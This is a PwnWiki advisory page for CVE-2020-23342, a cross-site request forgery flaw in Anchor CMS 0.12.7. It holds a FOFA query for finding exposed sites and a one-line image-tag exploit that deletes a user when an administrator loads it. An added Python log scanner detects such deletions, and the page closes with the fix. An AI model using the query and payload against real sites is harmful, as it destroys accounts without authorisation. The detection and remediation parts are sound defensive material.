CVE-2020-23342 Anchor CMS 0.12.7 Cross-Site Request Forgery Vulnerability

From PwnWiki
Revision as of 12:59, 23 May 2021 by Pwnwiki

FOFA

"Anchor CMS" && body="themes/default/img/favicon.png"

POC

Anchor CMS uses the GET method for sensitive operations, so exploit.html can be used to perform actions such as deleting users.

exploit.html

<img src="http://target/anchor/index.php/admin/users/delete/21">

When the administrator clicks it, the user with ID 21 is deleted.
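
For detection, the added example below (not part of the original page or of Anchor CMS) scans web server access logs for GET requests to the user-delete route shown in the PoC whose Referer is missing or points to another site. It assumes Combined Log Format; the host name `cms.example` and all log lines are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Combined Log Format:
# host ident user [time] "METHOD path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)
# Route shape taken from the PoC on this page: .../admin/users/delete/<id>
DELETE_RE = re.compile(r'/admin/users/delete/(?P<uid>\d+)(?:[/?#]|$)')


def find_suspect_deletes(lines, site_host):
    """Return GET hits on the user-delete route not referred by site_host.

    A missing Referer ("-") is also reported: referrer policies can strip
    it, so expect some false positives and triage by time and deleted ID.
    """
    site_host = site_host.lower()
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "GET":
            continue
        d = DELETE_RE.search(m["path"])
        if not d:
            continue
        ref_host = urlparse(m["referer"]).hostname  # None for "-" or empty
        if ref_host != site_host:
            hits.append({"time": m["ts"], "ip": m["ip"],
                         "user_id": int(d["uid"]),
                         "status": int(m["status"]),
                         "referer": m["referer"]})
    return hits


# Constructed sample log lines (not from a real server).
SAMPLE = [
    '198.51.100.7 - - [23/May/2021:12:58:40 +0000] "GET /anchor/index.php/admin/users HTTP/1.1" 200 5120 "http://cms.example/anchor/index.php/admin" "Mozilla/5.0"',
    '198.51.100.7 - - [23/May/2021:12:59:01 +0000] "GET /anchor/index.php/admin/users/delete/7 HTTP/1.1" 302 0 "http://cms.example/anchor/index.php/admin/users/edit/7" "Mozilla/5.0"',
    '198.51.100.7 - - [23/May/2021:13:02:11 +0000] "GET /anchor/index.php/admin/users/delete/21 HTTP/1.1" 302 0 "http://forum.invalid/thread/99" "Mozilla/5.0"',
    '198.51.100.7 - - [23/May/2021:13:05:30 +0000] "GET /anchor/index.php/admin/users/delete/22 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/May/2021:13:06:02 +0000] "POST /anchor/index.php/admin/users/edit/3 HTTP/1.1" 302 0 "http://cms.example/anchor/index.php/admin/users/edit/3" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_suspect_deletes(SAMPLE, "cms.example"):
        print(hit)
```

Log review only finds deletions after the fact; the root cause is removed when state-changing routes reject GET and require a per-session anti-CSRF token.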